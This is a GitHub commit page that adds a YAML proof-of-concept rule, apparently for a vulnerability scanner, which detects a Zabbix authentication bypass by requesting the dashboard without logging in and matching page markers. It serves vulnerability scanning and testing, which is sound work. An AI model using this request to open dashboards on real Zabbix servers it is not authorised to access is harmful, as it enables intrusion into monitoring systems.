Skip to content

Commit

Permalink
Create zabbix-authentication-bypass.yml (#480)
Browse files Browse the repository at this point in the history
  • Loading branch information
@FiveAourThe @virusdefender
FiveAourThe authored and virusdefender committed Oct 16, 2019
1 parent fc21a70 commit fef56cc
Showing 1 changed file with 11 additions and 0 deletions.
11 changes: 11 additions & 0 deletions pocs/zabbix-authentication-bypass.yml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,11 @@
name: poc-yaml-zabbix-authentication-bypass
rules:
- method: GET
path: /zabbix.php?action=dashboard.view&dashboardid=1
follow_redirects: false
expression: |
status == 200 && body.bcontains(b'<a class="top-nav-zbbshare" target="_blank" title="Zabbix Share" href="https://share.zabbix.com/">Share</a>') && body.bcontains(b'<title>Dashboard</title>')
detail:
author: FiveAourThe(https://github.com/FiveAourThe)
links:
- https://www.exploit-db.com/exploits/47467

0 comments on commit fef56cc

Please sign in to comment.